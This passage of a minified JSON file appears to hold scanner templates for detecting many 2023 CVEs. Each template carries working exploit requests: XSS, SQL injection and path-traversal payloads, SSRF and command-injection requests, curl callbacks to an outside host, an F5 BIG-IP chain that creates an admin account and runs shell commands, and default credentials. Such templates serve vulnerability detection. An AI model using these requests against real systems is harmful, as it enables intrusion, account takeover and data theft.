HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["contains(body_1, 'Setup is already complete')","contains(body_3, 'Please configure the system administrator account for this Confluence installation')","contains(location_5, '/index.action')","status_code_5 == 302","contains(body_6, 'Administration')"],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["\"USER: \"+ username","\"PASS: \"+ password"]}]}]},{"id":"CVE-2023-4169","info":{"name":"Ruijie RG-EW1200G Router - Password Reset","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/sys/set_passwd"],"body":"{\n\"username\":\"web\",\n\"admin_new\":\"{{password}}\"\n}\n","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"result\":\"ok\""]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3847","info":{"name":"MooDating 1.2 - Cross-Site scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/viewi1omd%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3el43yn/108?tab=activity"],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains_all(body, \">\",\"mooDating\")"],"condition":"and"}]}]},{"id":"CVE-2023-35844","info":{"name":"Lightdash version <= 0.510.3 Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/slack/image/slack-image{{repeat('%2F..', 3)}}%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-22432","info":{"name":"Web2py URL - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /admin/default/index HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npassword={{password}}&send=%5C%2F%5C%2Foast.pro&login=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["a href=\"\\/\\/oast.pro\""]},{"type":"word","part":"location","words":["\\/\\/oast.pro"]},{"type":"status","status":[303]}]}]},{"id":"CVE-2023-2122","info":{"name":"Image Optimizer by 10web < 1.0.26 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=iowd_settings&msg=1&iowd_tabs_active=generalry8uo%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3Ef0cmo HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type, \"text/html\")","contains(body_2, \"\")","contains(body_2, \"Image optimizer\")"],"condition":"and"}]}]},{"id":"CVE-2023-2813","info":{"name":"Wordpress Multiple Themes - Reflected Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?s={{str}}%3CIMG%20%22%22%22%3E%3CIMG%20SRC=/%20onerror=%22alert(document.domain)%22%3E%3C/img%3E/{{random}}/"],"matchers-condition":"and","matchers":[{"type":"word","words":["","wp-content/theme"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-23491","info":{"name":"Quick Event Manager < 9.7.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=qem_ajax_calendar&category=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains(body, \"\")","contains(body, \"qem_calendar\")"],"condition":"and"}]}]},{"id":"CVE-2023-6360","info":{"name":"WordPress My Calendar <3.4.22 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/my-calendar/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["My Calendar"]}]},{"raw":["@timeout: 20s\nGET /?rest_route=/my-calendar/v1/events&from=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(2)))a)+AND+'a'%3d'a HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header, \"application/json\")","contains(body, \"[]\")","duration >= 6"],"condition":"and"}]}]},{"id":"CVE-2023-2178","info":{"name":"Aajoda Testimonials < 2.2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/options-general.php?page=aajoda-testimonials HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naajodatestimonials_opt_hidden=Y&aajoda_version=2.0&aajodatestimonials_code=%22%3E%3C%2Ftextarea%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%0D%0A%0D%0A%0D%0A&Submit=Save\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \">\")","contains(body_2, \"page_aajoda-testimonials\")"],"condition":"and"}]}]},{"id":"CVE-2023-5556","info":{"name":"Structurizr on-premises - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /signin HTTP/1.1\nHost: {{Hostname}}\n","POST /login HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&_csrf={{csrf}}&hash=\n","GET /dashboard HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","GET /workspace/create HTTP/1.1\nHost: {{Hostname}}\n","GET /workspace/{{workspace}}/?version={{str}}%22);alert(document.domain);// HTTP/1.1\nHost: {{Hostname}}\n"],"attack":"pitchfork","payloads":{"username":["structurizr"],"password":["password"]},"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["","Sign out"],"condition":"and"},{"type":"word","part":"body_5","words":["\");alert(document.domain);//","Structurizr"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"([0-9a-z-]+)\""],"internal":true},{"type":"regex","name":"workspace","group":1,"part":"header","regex":["\\/workspace\\/([0-9]+)\\?scriptNonce="],"internal":true}]}]},{"id":"CVE-2023-4111","info":{"name":"PHPJabbers Bus Reservation System 1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=4005&pickup_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&cid=1&view=1&month=7&year=2023&start_dt=&end_dt=&locale=&index=0&session_id="],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"You have an error in your SQL syntax\", \">\")","contains(content_type, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-41763","info":{"name":"Skype for Business 2019 (SfB) - Blind Server-side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /lwa/Webpages/LwaClient.aspx?meeturl={{base64(ssrfpayload)}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Skype"]}]}]},{"id":"CVE-2023-0942","info":{"name":"WordPress Japanized for WooCommerce <2.5.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=wc4jp-options&tab=a HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"\") && contains(body_2, \"woocommerce-for-japan\")"],"condition":"and"}]}]},{"id":"CVE-2023-6114","info":{"name":"Duplicator < 1.5.7.1; Duplicator Pro < 4.5.14.2 - Unauthenticated Sensitive Data Exposure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/backups-dup-lite/tmp/","{{BaseURL}}/wp-content/backups-dup-pro/tmp/"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, '/tmp') && contains(body, 'Index of')"],"condition":"and"}]}]},{"id":"CVE-2023-2766","info":{"name":"Weaver OA 9.5 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header,\"text/plain\")","contains_all(body, \"sdbuser =\",\"sdbpassword =\")"],"condition":"and"}]}]},{"id":"CVE-2023-29922","info":{"name":"PowerJob V4.3.1 - Authentication Bypass","severity":"medium"},"requests":[{"raw":["POST /user/save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"username\":\"{{str}}\",\"phone\":\"{{str}}\",\"email\":\"{{str}}\",\"webHook\":\"{{str}}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"success\":true","\"data\":null"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1080","info":{"name":"WordPress GN Publisher <1.5.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=gn-publisher-settings&tab=%22%2F+onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"/ onmouseover=alert(document.domain);//\")","contains(body_2, \"GN Publisher\")"],"condition":"and"}]}]},{"id":"CVE-2023-40504","info":{"name":"LG Simple Editor <= v3.21.0 - Command Injection","severity":"critical"},"requests":[{"raw":["GET /simpleeditor/common/commonReleaseNotes.do HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"LG Simple Editor\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["POST /simpleeditor/imageManager/uploadVideo.do HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW\n\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"uploadVideo\"; filename=\"{{filename}}.bmp\"\n\n/\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"uploadPath\"\n\n/\"&cmd&cd ..&cd ..&cd ..&cd server&cd webapps&cd simpleeditor&del {{filename}}.bmp&/../\"\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"uploadFile_x\"\n\n1\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"uploadFile_width\"\n\n1\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"uploadFile_height\"\n\n1\n------WebKitFormBoundary7MA4YWxkTrZu0gW--\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"errorCode\",\"errorMessage\",\"fail\")","contains(content_type, \"application/json\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["POST /simpleeditor/fileSystem/makeDetailContent.do HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nAccept: application/json\n\n{\"command\":\"cp\",\"option\":\"-f\",\"srcPath\":\"/{{filename}}_original.bmp\",\"destPath\":\"/{{filename}}.jsp\"}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"errorCode\",\"errorMessage\",\"data\",\"success\")","contains(content_type, \"application/json\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /simpleeditor/{{filename}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-23492","info":{"name":"Login with Phone Number - Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=lwp_forgot_password&ID="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["","message\":\"Update password"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-20889","info":{"name":"VMware Aria Operations for Networks - Code Injection Information Disclosure Vulnerability","severity":"high"},"requests":[{"raw":["POST /api/auth/login HTTP/2\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\nX-Vrni-Csrf-Token: null\n\n{\"username\":\"{{username}}\",\"password\":\"{{password}}\",\"domain\":\"localdomain\"}\n","POST /api/pdfexport HTTP/2\nHost: {{Hostname}}\nX-Vrni-Csrf-Token: {{csrf}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFkpSYDWZ5w9YNjmh\n\n------WebKitFormBoundaryFkpSYDWZ5w9YNjmh\nContent-Disposition: form-data; name=\"{{randstr}}\"\n\n\n\n\nTest\n\n\n

    \n\n\n------WebKitFormBoundaryFkpSYDWZ5w9YNjmh--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns","http"]},{"type":"word","part":"header_2","words":["application/octet-stream"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["csrfToken\":\"([a-z0-9A-Z/+=]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-4114","info":{"name":"PHP Jabbers Night Club Booking 1.0 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&date="],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"Drinks & Extras\", \"Checkout\", \">\")"],"condition":"and"}]}]},{"id":"CVE-2023-36287","info":{"name":"Webkul QloApps 1.6.0 - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncontroller=change-currency9405'-alert(document.domain)-'&id_currency=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'change-currency9405'-alert(document.domain)-'';","customizationIdMessage"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-4450","info":{"name":"JeecgBoot JimuReport - Template injection","severity":"critical"},"requests":[{"raw":["POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n \"sql\": \"<#assign ex=\\\"freemarker.template.utility.Execute\\\"?new()>${ex(\\\"curl http://{{interactsh-url}}\\\")} \",\n \"type\": \"0\"\n}\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"http\") || contains(interactsh_protocol, \"dns\")","status_code == 200","contains(content_type,\"application/json\")","contains(body,\"success\")"],"condition":"and"}]}]},{"id":"CVE-2023-4451","info":{"name":"Cockpit - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/install/index.php?1692443074&space=%3Cimg%20src=1%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Space :: does not exist"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1263","info":{"name":"Coming Soon & Maintenance < 4.1.7 - Unauthenticated Post/Page Access","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=cmp_get_post_detail&id=1\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"img\":","\"date\":","\"title\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27032","info":{"name":"PrestaShop AdvancedPopupCreator - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","@timeout 20s\nPOST /module/advancedpopupcreator/popup HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\navailablePopups=if(now()=sysdate()%2Csleep(6)%2C0)&event=1&fromController=product&getPopup=1&id_category=0&id_manufacturer=0&id_product=1&id_supplier=0&referrer=&responsiveWidth=1280&time={{time}}&token={{token}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code == 200","contains(content_type, \"text/html\")","contains_all(body, 'popups','hasError')"],"condition":"and"}],"extractors":[{"type":"regex","name":"time","group":1,"regex":[",\"time\":([0-9]+),"],"internal":true},{"type":"regex","name":"token","group":1,"regex":[",\"static_token\":\"([0-9a-z]+)\","],"internal":true}]}]},{"id":"CVE-2023-3848","info":{"name":"MooDating 1.2 - Cross-site scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/viewi1omd\">l43yn/108?tab=activity"],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains_all(body, \"\", \"mooDating\")"],"condition":"and"}]}]},{"id":"CVE-2023-26842","info":{"name":"ChurchCRM 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /session/begin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUser={{username}}&Password={{password}}\n","POST /OptionManager.php?mode=classes&ListID=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n1name=Member&2name=Regular+Attender&3name=Guest&4name=Non-Attender&5name=Non-Attender+%28staff%29&newFieldName=\" onfocus=alert(document.domain) autofocus=\"&AddField=Add+New+Person+Classification\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"onfocus=alert(document.domain) autofocus=\")","contains(body_2, \"ChurchCRM\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2023-48023","info":{"name":"Anyscale Ray 2.6.3 and 2.8.0 - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/log_proxy?url=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["

    Interactsh Server

    "]}]}]},{"id":"CVE-2023-6379","info":{"name":"OpenCMS 14 & 15 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}{{paths}}"],"payloads":{"paths":["/tagebuch/eintraege/index.html?reloaded&page=1\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/list-editor/index.html?reloaded&page=3\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/advanced-elements/list/index.html?reloaded&sort=date_asc&page=3\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/advanced-elements/list/list-filters/index.html?reloaded&sort=date_asc&page=2\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/lists/compact/index.html?reloaded&sort=date_desc&page=2\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/lists/elaborate/index.html?reloaded&sort=date_desc&page=2\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/lists/text-tiles/index.html?reloaded&sort=date_asc&page=2\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/lists/masonry/index.html?reloaded&sort=date_asc&page=2\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/blog/articles/index.html?reloaded&page=2\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/advanced-elements/form/index.html?formsubmit=12&formaction1=submit&InputField-11939054842=mrs&InputField-21939054842=190806&InputField-31939054842=403105&InputField-41939054842=2&InputField-51939054842=&InputField-61939054842=1&captcha_token_id=1\">\" />","OpenCms"],"condition":"and"},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0562","info":{"name":"Bank Locker Management System v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /banker/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+AND+4719%3D4719--+GZHh&inputpwd=ABC&login=\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"admin\")","contains(body, \"BLMS | Dashboard\")"],"condition":"and"}]}]},{"id":"CVE-2023-33338","info":{"name":"Old Age Home Management System v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=vaday%27+or+1%3D1%23&password=password&submit=\n","GET /admin/dashboard.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"Change Password\")","contains(body_2, \"Old Age Home Management System|| Dashboard\")"],"condition":"and"}]}]},{"id":"CVE-2023-0900","info":{"name":"AP Pricing Tables Lite <= 1.1.6 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=ap-pricing-tables-lite&message=1 HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nContent-Type: application/x-www-form-urlencoded\n\naction=backend_ajax&_action=copy_table&table_id=1+AND+(SELECT+2035+FROM+(SELECT(SLEEP(10)))A)&_wpnonce={{nonce}}\n"],"matchers":[{"type":"dsl","dsl":["duration_3>=5","status_code_3 == 200","contains(body_3, \"Security check\")","contains(body_2, \"ap-pricing-tables-lite\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","part":"body","group":1,"regex":["_wpnonce=([0-9a-z]+)\">Log Out"],"internal":true}]}]},{"id":"CVE-2023-0236","info":{"name":"WordPress Tutor LMS <2.0.10 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /dashboard/retrieve-password/?reset_key=%22%3E%3Csvg%20onload=prompt(document.domain)%3E&user_id=dd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"\")","contains(body_2, \"Instructor Registration\")"],"condition":"and"}]}]},{"id":"CVE-2023-1671","info":{"name":"Sophos Web Appliance - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /index.php?c=blocked&action=continue HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargs_reason=filetypewarn&url={{randstr}}&filetype={{randstr}}&user={{randstr}}&user_encoded={{base64(\"\\';curl http://{{interactsh-url}} #\")}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2023-48241","info":{"name":"XWiki < 4.10.15 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/get/XWiki/SuggestSolrService?outputSyntax=plain&media=json&nb=1000&query=q%3D*%3A*%0Aq.op%3DAND%0Afq%3Dtype%3ADOCUMENT%0Afl%3Dtitle_%2C+reference%2C+links%2C+doccontentraw_%2C+objcontent__&input=+","{{BaseURL}}/xwiki/bin/get/XWiki/SuggestSolrService?outputSyntax=plain&media=json&nb=1000&query=q%3D*%3A*%0Aq.op%3DAND%0Afq%3Dtype%3ADOCUMENT%0Afl%3Dtitle_%2C+reference%2C+links%2C+doccontentraw_%2C+objcontent__&input=+"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"reference\":","title_\":"],"condition":"or"},{"type":"dsl","dsl":["contains(body, \"services.localization.render\")","contains(header, \"application/json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-4415","info":{"name":"Ruijie RG-EW1200G Router Background - Login Bypass","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/sys/login"],"body":"{\n \"username\":\"2\",\n \"password\":\"admin\",\n \"timestamp\":1695218596000\n}\n","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"result\":\"ok\"","\"msg\":\"\u767b\u5165\u6210\u529f\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-46747","info":{"name":"F5 BIG-IP - Unauthenticated RCE via AJP Smuggling","severity":"critical"},"requests":[{"raw":["POST /tmui/login.jsp HTTP/1.1\nHost: {{Hostname}}\nTransfer-Encoding: chunked, chunked\nContent-Type: application/x-www-form-urlencoded\n\n204\n{{ hex_decode(concat(\"0008485454502f312e310000122f746d75692f436f6e74726f6c2f666f726d0000093132372e302e302e310000096c6f63616c686f73740000096c6f63616c686f7374000050000003000b546d75692d44756262756600000b424242424242424242424200000a52454d4f5445524f4c450000013000a00b00096c6f63616c686f73740003000561646d696e000501715f74696d656e6f773d61265f74696d656e6f775f6265666f72653d2668616e646c65723d253266746d756925326673797374656d25326675736572253266637265617465262626666f726d5f706167653d253266746d756925326673797374656d253266757365722532666372656174652e6a737025336626666f726d5f706167655f6265666f72653d26686964654f626a4c6973743d265f62756676616c75653d65494c3452556e537758596f5055494f47634f4678326f30305863253364265f62756676616c75655f6265666f72653d2673797374656d757365722d68696464656e3d5b5b2241646d696e6973747261746f72222c225b416c6c5d225d5d2673797374656d757365722d68696464656e5f6265666f72653d266e616d653d\",username,\"266e616d655f6265666f72653d267061737377643d\",password,\"267061737377645f6265666f72653d2666696e69736865643d782666696e69736865645f6265666f72653d00ff00\")) }}\n0\n\n"],"unsafe":true},{"raw":["PATCH /mgmt/tm/auth/user/{{hex_decode(username)}} HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic {{base64(hex_decode(username)+\":\"+hex_decode(password))}}\nContent-Type: application/json\n\n{\"password\": \"{{password2}}\"}\n\n","POST /mgmt/shared/authn/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"username\":\"{{hex_decode(username)}}\", \"password\":\"{{pass}}\"}\n\n","POST /mgmt/tm/util/bash HTTP/1.1\nHost: {{Hostname}}\nX-F5-Auth-Token: {{token}}\nContent-Type: application/json\n\n{\"command\":\"run\",\"utilCmdArgs\":\"-c id\"}\n\n"],"payloads":{"pass":["{{password2}}","{{hex_decode(password)}}"]},"skip-variables-check":true,"stop-at-first-match":true,"extractors":[{"type":"regex","part":"body_2","name":"token","group":1,"regex":["([A-Z0-9]{26})"],"internal":true},{"type":"regex","part":"body_3","group":1,"regex":["\"commandResult\":\"(.*)\""]},{"type":"dsl","dsl":["\"Username:\" + hex_decode(username)","\"Password:\" + pass","\"Token:\" + token"]}],"matchers":[{"type":"word","words":["commandResult","uid="],"condition":"and"}]}]},{"id":"CVE-2023-45855","info":{"name":"qdPM 9.2 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/uploads/"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Index of /uploads","attachments/"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-5222","info":{"name":"Viessmann Vitogate 300 - Hardcoded Password","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/vitogate.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"method\":\"put\",\"form\":\"form-login\",\"params\":{\"uid\":\"{{username}}\",\"pwd\":\"{{password}}\"}}\n"],"attack":"pitchfork","payloads":{"username":["vitomaster","vitogate"],"password":["viessmann1917","viessmann"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["admin\":true","\"sessionId\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27639","info":{"name":"PrestaShop TshirteCommerce - Directory Traversal","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/tshirtecommerce/ajax.php?type=svg"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"body":"url=.%2F..%2Fvendor%2Fjdorn%2Fsql-formatter%2Fexamples&file_name=examples.php","matchers-condition":"and","matchers":[{"type":"word","words":["SqlFormatter Examples","SqlFormatter",""],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"New Question\", \">\")"],"condition":"and"}]}]},{"id":"CVE-2023-42442","info":{"name":"JumpServer > 3.6.4 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/terminal/sessions/"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"terminal\":","\"user_id\":\"","\"account_id\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6380","info":{"name":"OpenCms 14 & 15 - Open 